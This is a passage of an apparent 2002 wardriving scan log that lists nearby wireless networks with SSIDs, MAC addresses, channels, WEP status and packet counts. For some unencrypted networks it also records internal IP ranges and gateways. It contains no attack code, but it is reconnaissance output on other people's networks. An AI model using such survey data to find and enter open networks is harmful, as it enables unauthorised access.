"AP340-4332cf" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 20:39:57 2002" Last : "Sat Jun 22 20:39:57 2002" Network 19: "USIG_Training" BSSID: "00:40:96:33:C5:81" Type : probe Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 20:39:58 2002" Last : "Sat Jun 22 20:39:58 2002" Network 20: "DTCAP1" BSSID: "00:30:AB:07:AE:47" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 20:40:01 2002" Last : "Sat Jun 22 20:40:04 2002" Network 21: "TogetherWeAre>" BSSID: "00:40:96:56:2B:0B" Type : infrastructure Info : "hctxap18b" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 20:40:15 2002" Last : "Sat Jun 22 20:40:24 2002" Network 22: "w3y3rl355" BSSID: "00:40:96:41:0B:CC" Type : infrastructure Info : "AP350-410bcc" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 13 Data : 0 Crypt : 0 Weak : 0 Total : 13 First : "Sat Jun 22 20:40:20 2002" Last : "Sat Jun 22 20:40:29 2002" Network 23: "w3y3rl355" BSSID: "00:40:96:41:17:4A" Type : infrastructure Info : "AP2ndFloor" Channel : 08 WEP : "Yes" Maxrate : 11.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 20:40:21 2002" Last : "Sat Jun 22 20:40:23 2002" Network 24: "SYD-JEFF-WIRELESS" BSSID: "00:04:5A:0E:FE:03" Type : infrastructure Info : "None" Channel : 04 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 20:41:12 2002" Last : "Sat Jun 22 20:41:13 2002" Network 25: "" BSSID: "00:02:2D:08:ED:F0" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 111 Crypt : 0 Weak : 0 Total : 111 First : "Sat Jun 22 20:42:57 2002" Last : "Sat Jun 22 20:43:57 2002" Network 26: "" BSSID: "00:02:2D:04:BC:0A" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 5 Crypt : 0 Weak : 0 Total : 5 First : "Sat Jun 22 20:45:23 2002" Last : "Sat Jun 22 20:45:23 2002" Network 27: "imc2" BSSID: "00:60:1D:F0:39:12" Type : infrastructure Info : "None" Channel : 03 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 20:45:23 2002" Last : "Sat Jun 22 20:45:23 2002" Network 28: "imc2" BSSID: "00:02:2D:00:B6:D5" Type : infrastructure Info : "None" Channel : 03 WEP : "No" Maxrate : 11.0 LLC : 6 Data : 2 Crypt : 0 Weak : 0 Total : 8 First : "Sat Jun 22 20:45:23 2002" Last : "Sat Jun 22 20:45:24 2002" Address found via UDP 10.100.0.0 Network 29: "" BSSID: "00:02:2D:04:BC:32" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 12 Crypt : 0 Weak : 0 Total : 12 First : "Sat Jun 22 20:45:37 2002" Last : "Sat Jun 22 20:45:41 2002" Network 30: "INTERMEC" BSSID: "00:02:2D:50:42:99" Type : infrastructure Info : "None" Channel : 03 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 20:46:44 2002" Last : "Sat Jun 22 20:46:46 2002" Network 31: "INTERMEC" BSSID: "00:02:2D:50:42:8A" Type : infrastructure Info : "None" Channel : 03 WEP : "Yes" Maxrate : 11.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Total : 5 First : "Sat Jun 22 20:46:46 2002" Last : "Sat Jun 22 20:46:50 2002" Network 32: "EPIX" BSSID: "00:50:DA:95:1E:AE" Type : infrastructure Info : "None" Channel : 03 WEP : "No" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 20:46:50 2002" Last : "Sat Jun 22 20:46:55 2002" Network 33: "TECHENABLERS" BSSID: "00:50:8B:99:14:E3" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 20:46:53 2002" Last : "Sat Jun 22 20:46:53 2002" Network 34: "" BSSID: "00:02:2D:1F:ED:91" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 3 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 20:47:27 2002" Last : "Sat Jun 22 20:47:32 2002" Network 35: "ATC" BSSID: "00:E0:03:04:2F:57" Type : infrastructure Info : "None" Channel : 04 WEP : "No" Maxrate : 2.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 20:47:41 2002" Last : "Sat Jun 22 20:47:46 2002" Network 36: "" BSSID: "00:40:96:39:F6:5E" Type : infrastructure Info : "OilSecNorth" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 20:48:11 2002" Last : "Sat Jun 22 20:48:11 2002" Network 37: "AMAZING" BSSID: "00:E0:03:04:2C:C1" Type : infrastructure Info : "None" Channel : 04 WEP : "No" Maxrate : 2.0 LLC : 60 Data : 0 Crypt : 0 Weak : 0 Total : 60 First : "Sat Jun 22 20:55:37 2002" Last : "Sat Jun 22 20:56:36 2002" Network 38: "OilSecNorth" BSSID: "00:40:96:3A:37:1A" Type : infrastructure Info : "TriState" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 20:56:39 2002" Last : "Sat Jun 22 20:57:38 2002" Network 39: "101" BSSID: "00:01:24:F0:66:68" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 8051 Data : 0 Crypt : 0 Weak : 0 Total : 8051 First : "Sat Jun 22 20:57:55 2002" Last : "Sat Jun 22 21:02:08 2002" Network 40: "" BSSID: "00:02:2D:00:64:A8" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 57 Crypt : 0 Weak : 0 Total : 57 First : "Sat Jun 22 20:57:55 2002" Last : "Sat Jun 22 20:58:31 2002" Network 41: "" BSSID: "00:02:2D:04:BB:DA" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 4 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 20:58:13 2002" Last : "Sat Jun 22 20:58:18 2002" Network 42: "" BSSID: "00:02:2D:04:C0:53" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 2 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 20:58:37 2002" Last : "Sat Jun 22 20:58:37 2002" Network 43: "" BSSID: "00:40:96:40:93:08" Type : infrastructure Info : "D3201W" Channel : 02 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 20:59:38 2002" Last : "Sat Jun 22 20:59:38 2002" Network 44: "HayBooNetAP" BSSID: "00:40:96:40:9C:58" Type : infrastructure Info : "D2701W" Channel : 03 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:01:24 2002" Last : "Sat Jun 22 21:01:24 2002" Network 45: "" BSSID: "00:07:EB:31:87:F0" Type : probe Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:01:28 2002" Last : "Sat Jun 22 21:01:28 2002" Network 46: "" BSSID: "00:20:E0:8A:7A:61" Type : probe Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:01:52 2002" Last : "Sat Jun 22 21:01:52 2002" Network 47: "Dwayne" BSSID: "00:40:96:48:D0:C9" Type : infrastructure Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:01:54 2002" Last : "Sat Jun 22 21:01:59 2002" Network 48: "47qt396b" BSSID: "00:02:2D:04:A0:25" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 1180 Data : 0 Crypt : 0 Weak : 0 Total : 1180 First : "Sat Jun 22 21:02:00 2002" Last : "Sat Jun 22 21:03:35 2002" Network 49: "47qt396b" BSSID: "00:02:2D:07:D6:FB" Type : infrastructure Info : "None" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 47 Data : 0 Crypt : 0 Weak : 0 Total : 47 First : "Sat Jun 22 21:02:04 2002" Last : "Sat Jun 22 21:02:31 2002" Network 50: "" BSSID: "00:40:96:54:EC:58" Type : infrastructure Info : "csbew03b" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 16 Data : 0 Crypt : 0 Weak : 0 Total : 16 First : "Sat Jun 22 21:02:17 2002" Last : "Sat Jun 22 21:02:26 2002" Network 51: "" BSSID: "00:40:96:57:D0:0C" Type : infrastructure Info : "csbew02b" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 17 Data : 1 Crypt : 0 Weak : 0 Total : 18 First : "Sat Jun 22 21:02:17 2002" Last : "Sat Jun 22 21:02:31 2002" Network 52: "" BSSID: "00:40:96:32:AB:75" Type : infrastructure Info : "csbew03a" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 8 Data : 0 Crypt : 0 Weak : 0 Total : 8 First : "Sat Jun 22 21:02:21 2002" Last : "Sat Jun 22 21:02:26 2002" Network 53: "" BSSID: "00:40:96:31:EA:BF" Type : infrastructure Info : "csbew04b" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 6 Data : 0 Crypt : 0 Weak : 0 Total : 6 First : "Sat Jun 22 21:02:21 2002" Last : "Sat Jun 22 21:02:26 2002" Network 54: "" BSSID: "00:40:96:55:F4:72" Type : infrastructure Info : "csbew06c" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 21:02:21 2002" Last : "Sat Jun 22 21:02:26 2002" Network 55: "" BSSID: "00:40:96:32:B5:D7" Type : infrastructure Info : "csbew02a" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 11 Data : 0 Crypt : 0 Weak : 0 Total : 11 First : "Sat Jun 22 21:02:21 2002" Last : "Sat Jun 22 21:02:28 2002" Network 56: "" BSSID: "00:40:96:32:B6:80" Type : infrastructure Info : "csbew01a" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 11 Data : 1 Crypt : 0 Weak : 0 Total : 12 First : "Sat Jun 22 21:02:21 2002" Last : "Sat Jun 22 21:02:31 2002" Network 57: "" BSSID: "00:40:96:32:F1:BE" Type : infrastructure Info : "csbew11a" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 21:02:21 2002" Last : "Sat Jun 22 21:02:26 2002" Network 58: "" BSSID: "00:40:96:32:95:94" Type : infrastructure Info : "csbew04a" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 21:02:22 2002" Last : "Sat Jun 22 21:02:27 2002" Network 59: "" BSSID: "00:40:96:32:0A:EE" Type : infrastructure Info : "csbew06a" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 12 Data : 0 Crypt : 0 Weak : 0 Total : 12 First : "Sat Jun 22 21:02:22 2002" Last : "Sat Jun 22 21:02:36 2002" Network 60: "" BSSID: "00:40:96:34:59:93" Type : infrastructure Info : "csbew10a" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 21:02:22 2002" Last : "Sat Jun 22 21:02:27 2002" Network 61: "" BSSID: "00:40:96:37:F6:36" Type : infrastructure Info : "csbew12a" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:02:27 2002" Last : "Sat Jun 22 21:02:27 2002" Network 62: "linksys" BSSID: "00:04:5A:CF:B7:9F" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:02:35 2002" Last : "Sat Jun 22 21:02:35 2002" Network 63: "" BSSID: "00:60:1D:23:7A:B5" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 1272 Crypt : 0 Weak : 0 Total : 1272 First : "Sat Jun 22 21:02:49 2002" Last : "Sat Jun 22 21:21:35 2002" Network 64: "" BSSID: "00:40:96:45:B3:3A" Type : infrastructure Info : "bocxw15b" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 8 Data : 0 Crypt : 0 Weak : 0 Total : 8 First : "Sat Jun 22 21:02:49 2002" Last : "Sat Jun 22 21:03:03 2002" Network 65: "1900 Elm" BSSID: "00:02:2D:3C:DC:97" Type : infrastructure Info : "None" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:02:53 2002" Last : "Sat Jun 22 21:02:54 2002" Network 66: "" BSSID: "00:40:96:40:A8:FE" Type : infrastructure Info : "bocxw20c" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 14 Data : 0 Crypt : 0 Weak : 0 Total : 14 First : "Sat Jun 22 21:02:53 2002" Last : "Sat Jun 22 21:21:53 2002" Network 67: "" BSSID: "00:40:96:54:BB:DC" Type : infrastructure Info : "bocxw16c" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:02:54 2002" Last : "Sat Jun 22 21:02:54 2002" Network 68: "Records AP" BSSID: "00:50:DA:F5:BA:A1" Type : infrastructure Info : "None" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 21:03:11 2002" Last : "Sat Jun 22 21:03:13 2002" Network 69: "" BSSID: "00:02:2D:1C:AC:1C" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 1 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:03:17 2002" Last : "Sat Jun 22 21:03:17 2002" Network 70: "Records AP" BSSID: "00:50:DA:F5:C1:5D" Type : infrastructure Info : "None" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:03:26 2002" Last : "Sat Jun 22 21:03:26 2002" Network 71: "pegasus" BSSID: "00:40:96:50:29:D8" Type : infrastructure Info : "AP350-5029d8" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1368 Data : 0 Crypt : 0 Weak : 0 Total : 1368 First : "Sat Jun 22 21:03:35 2002" Last : "Sat Jun 22 21:05:20 2002" Network 72: "FPX" BSSID: "00:02:2D:1F:65:C1" Type : infrastructure Info : "None" Channel : 01 WEP : "Yes" Maxrate : 0.0 LLC : 145 Data : 0 Crypt : 0 Weak : 0 Total : 145 First : "Sat Jun 22 21:03:35 2002" Last : "Sat Jun 22 21:03:45 2002" Network 73: "default" BSSID: "00:40:05:DE:25:0E" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 28 Data : 62 Crypt : 0 Weak : 0 Total : 90 First : "Sat Jun 22 21:03:35 2002" Last : "Sat Jun 22 21:03:53 2002" Address found via ARP 10.0.1.26 Network 74: "" BSSID: "00:30:65:19:C8:E8" Type : probe Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:03:36 2002" Last : "Sat Jun 22 21:03:46 2002" Network 75: "linksys" BSSID: "00:03:2F:00:68:02" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:03:39 2002" Last : "Sat Jun 22 21:03:40 2002" Network 76: "" BSSID: "00:02:2D:04:89:20" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 10 Crypt : 0 Weak : 0 Total : 10 First : "Sat Jun 22 21:03:39 2002" Last : "Sat Jun 22 21:03:44 2002" Network 77: "ideagroup" BSSID: "00:40:96:28:B6:C3" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:03:52 2002" Last : "Sat Jun 22 21:03:52 2002" Network 78: "Barnes and Roberts Airport" BSSID: "00:02:2D:08:EB:D6" Type : infrastructure Info : "None" Channel : 01 WEP : "Yes" Maxrate : 0.0 LLC : 128 Data : 0 Crypt : 0 Weak : 0 Total : 128 First : "Sat Jun 22 21:05:20 2002" Last : "Sat Jun 22 21:05:34 2002" Network 79: "linksys" BSSID: "00:04:5A:D1:A4:5D" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 472 Data : 6 Crypt : 0 Weak : 0 Total : 478 First : "Sat Jun 22 21:05:25 2002" Last : "Sat Jun 22 21:05:55 2002" Address found via UDP 192.168.1.0 Network 80: "COX" BSSID: "00:30:AB:12:15:5D" Type : infrastructure Info : "None" Channel : 07 WEP : "No" Maxrate : 11.0 LLC : 7 Data : 1 Crypt : 0 Weak : 0 Total : 8 First : "Sat Jun 22 21:05:37 2002" Last : "Sat Jun 22 21:05:41 2002" Network 81: "Black Eye Digital (Airport)" BSSID: "00:30:65:03:7A:60" Type : infrastructure Info : "None" Channel : 04 WEP : "Yes" Maxrate : 11.0 LLC : 201 Data : 0 Crypt : 0 Weak : 0 Total : 201 First : "Sat Jun 22 21:05:55 2002" Last : "Sat Jun 22 21:06:36 2002" Network 82: "linksys" BSSID: "00:03:2F:01:15:6F" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1269 Data : 58 Crypt : 0 Weak : 0 Total : 1327 First : "Sat Jun 22 21:05:56 2002" Last : "Sat Jun 22 21:07:19 2002" Address found via DHCP 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 Network 83: "bonita" BSSID: "00:06:25:60:40:83" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 13 Data : 0 Crypt : 0 Weak : 0 Total : 13 First : "Sat Jun 22 21:05:56 2002" Last : "Sat Jun 22 21:06:34 2002" Network 84: "Raygun Airport" BSSID: "00:02:2D:09:25:52" Type : infrastructure Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 14 Data : 0 Crypt : 0 Weak : 0 Total : 14 First : "Sat Jun 22 21:05:57 2002" Last : "Sat Jun 22 21:06:24 2002" Network 85: "linksys" BSSID: "00:06:25:51:76:A9" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 7 Data : 9 Crypt : 0 Weak : 0 Total : 16 First : "Sat Jun 22 21:06:47 2002" Last : "Sat Jun 22 21:06:49 2002" Network 86: "Apple Network 0fab34" BSSID: "00:02:2D:0F:AB:34" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 1427 Data : 0 Crypt : 0 Weak : 0 Total : 1427 First : "Sat Jun 22 21:07:14 2002" Last : "Sat Jun 22 21:09:09 2002" Network 87: "" BSSID: "00:02:2D:01:48:2E" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 7 Crypt : 0 Weak : 0 Total : 7 First : "Sat Jun 22 21:07:37 2002" Last : "Sat Jun 22 21:21:35 2002" Network 88: "ugate" BSSID: "00:10:2B:01:1D:9A" Type : infrastructure Info : "None" Channel : 03 WEP : "No" Maxrate : 11.0 LLC : 10 Data : 0 Crypt : 0 Weak : 0 Total : 10 First : "Sat Jun 22 21:08:30 2002" Last : "Sat Jun 22 21:20:19 2002" Network 89: "" BSSID: "00:02:2D:04:C2:6A" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 24 Crypt : 0 Weak : 0 Total : 24 First : "Sat Jun 22 21:08:55 2002" Last : "Sat Jun 22 21:20:26 2002" Network 90: "Zoom0333a1" BSSID: "00:40:36:01:87:4E" Type : ad-hoc Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:08:55 2002" Last : "Sat Jun 22 21:08:55 2002" Network 91: "ExpoPark" BSSID: "00:04:5A:0E:7A:E8" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 0.0 LLC : 538 Data : 0 Crypt : 0 Weak : 0 Total : 538 First : "Sat Jun 22 21:09:09 2002" Last : "Sat Jun 22 21:09:45 2002" Network 92: "linksys" BSSID: "00:04:5A:D2:7E:65" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 27005 Data : 0 Crypt : 0 Weak : 0 Total : 27005 First : "Sat Jun 22 21:09:41 2002" Last : "Sat Jun 22 21:43:23 2002" Network 93: "Apple Network 0959e9" BSSID: "00:02:2D:09:59:E9" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:20:30 2002" Last : "Sat Jun 22 21:20:30 2002" Network 94: "gfwirelesslan" BSSID: "00:06:25:53:5E:47" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:20:59 2002" Last : "Sat Jun 22 21:20:59 2002" Network 95: "" BSSID: "00:40:96:45:A6:B1" Type : infrastructure Info : "bocxw20b" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:21:35 2002" Last : "Sat Jun 22 21:21:35 2002" Network 96: "" BSSID: "00:40:96:54:81:6B" Type : infrastructure Info : "bocxw16b" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:21:54 2002" Last : "Sat Jun 22 21:21:54 2002" Network 97: "" BSSID: "00:02:2D:01:EF:FC" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 1 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:22:16 2002" Last : "Sat Jun 22 21:22:16 2002" Network 98: "TribalDDB-Mobile" BSSID: "00:A0:F8:43:39:D7" Type : infrastructure Info : "None" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:22:30 2002" Last : "Sat Jun 22 21:22:30 2002" Network 99: "101" BSSID: "00:04:5A:0E:51:06" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:22:48 2002" Last : "Sat Jun 22 21:22:48 2002" Network 100: "Trizec_Hahn_dallas3" BSSID: "00:40:96:25:8D:8D" Type : infrastructure Info : "Reniassance_3" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 6 Data : 0 Crypt : 0 Weak : 0 Total : 6 First : "Sat Jun 22 21:23:33 2002" Last : "Sat Jun 22 21:23:34 2002" Network 101: "" BSSID: "00:40:96:41:62:D9" Type : infrastructure Info : "ACSDA5W82" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:23:47 2002" Last : "Sat Jun 22 21:23:47 2002" Network 102: "ACS_LEAP" BSSID: "00:40:96:41:E8:88" Type : infrastructure Info : "ACSDA5W83" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 7 Data : 0 Crypt : 0 Weak : 0 Total : 7 First : "Sat Jun 22 21:23:52 2002" Last : "Sat Jun 22 21:23:57 2002" Network 103: "sleepers" BSSID: "00:06:25:53:87:E9" Type : infrastructure Info : "None" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:24:11 2002" Last : "Sat Jun 22 21:24:11 2002" Network 104: "WaveLAN Network" BSSID: "00:60:1D:21:7D:89" Type : infrastructure Info : "None" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 2 Data : 1 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 21:24:11 2002" Last : "Sat Jun 22 21:24:11 2002" Address found via UDP 10.91.0.0 Network 105: "" BSSID: "00:02:2D:04:89:89" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 29 Crypt : 0 Weak : 0 Total : 29 First : "Sat Jun 22 21:25:56 2002" Last : "Sat Jun 22 21:26:01 2002" Network 106: "NorthPark" BSSID: "00:04:5A:0F:33:80" Type : infrastructure Info : "None" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:27:41 2002" Last : "Sat Jun 22 21:27:41 2002" Network 107: "linksys" BSSID: "00:06:25:50:3E:43" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:27:41 2002" Last : "Sat Jun 22 21:27:41 2002" Network 108: "TRG Airport Network" BSSID: "00:02:2D:06:21:06" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 5 Data : 5 Crypt : 0 Weak : 0 Total : 10 First : "Sat Jun 22 21:28:03 2002" Last : "Sat Jun 22 21:28:13 2002" Network 109: "" BSSID: "00:40:96:51:EE:D6" Type : infrastructure Info : "lincoln-main" Channel : 05 WEP : "Yes" Maxrate : 11.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Total : 5 First : "Sat Jun 22 21:28:07 2002" Last : "Sat Jun 22 21:28:39 2002" Network 110: "TRG Airport Network" BSSID: "00:60:1D:1E:E3:67" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 2 Data : 1 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 21:28:08 2002" Last : "Sat Jun 22 21:28:08 2002" Network 111: "TRG Airport Network" BSSID: "00:02:2D:06:20:F4" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:28:08 2002" Last : "Sat Jun 22 21:28:08 2002" Network 112: "RichardsI_LinkSys" BSSID: "00:06:25:51:66:BB" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:28:08 2002" Last : "Sat Jun 22 21:28:08 2002" Network 113: "TRG Airport Network" BSSID: "00:02:2D:0E:22:26" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 2 Data : 1 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 21:28:12 2002" Last : "Sat Jun 22 21:28:12 2002" Network 114: "" BSSID: "00:02:2D:01:93:3D" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 5 Crypt : 0 Weak : 0 Total : 5 First : "Sat Jun 22 21:28:18 2002" Last : "Sat Jun 22 21:28:36 2002" Network 115: "" BSSID: "00:40:96:30:41:12" Type : infrastructure Info : "0675_wap1" Channel : 07 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:28:35 2002" Last : "Sat Jun 22 21:28:35 2002" Network 116: "" BSSID: "00:40:96:12:A9:86" Type : infrastructure Info : "AP4500E_12a986" Channel : 11 WEP : "Yes" Maxrate : 2.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Total : 5 First : "Sat Jun 22 21:28:36 2002" Last : "Sat Jun 22 21:28:45 2002" Network 117: "WaveLAN Network" BSSID: "00:02:2D:2C:A0:6D" Type : infrastructure Info : "None" Channel : 10 WEP : "No" Maxrate : 11.0 LLC : 9 Data : 1 Crypt : 0 Weak : 0 Total : 10 First : "Sat Jun 22 21:29:20 2002" Last : "Sat Jun 22 21:38:58 2002" Address found via ARP 10.245.119.0 Network 118: "" BSSID: "00:02:2D:0C:B2:63" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 3 Crypt : 0 Weak : 0 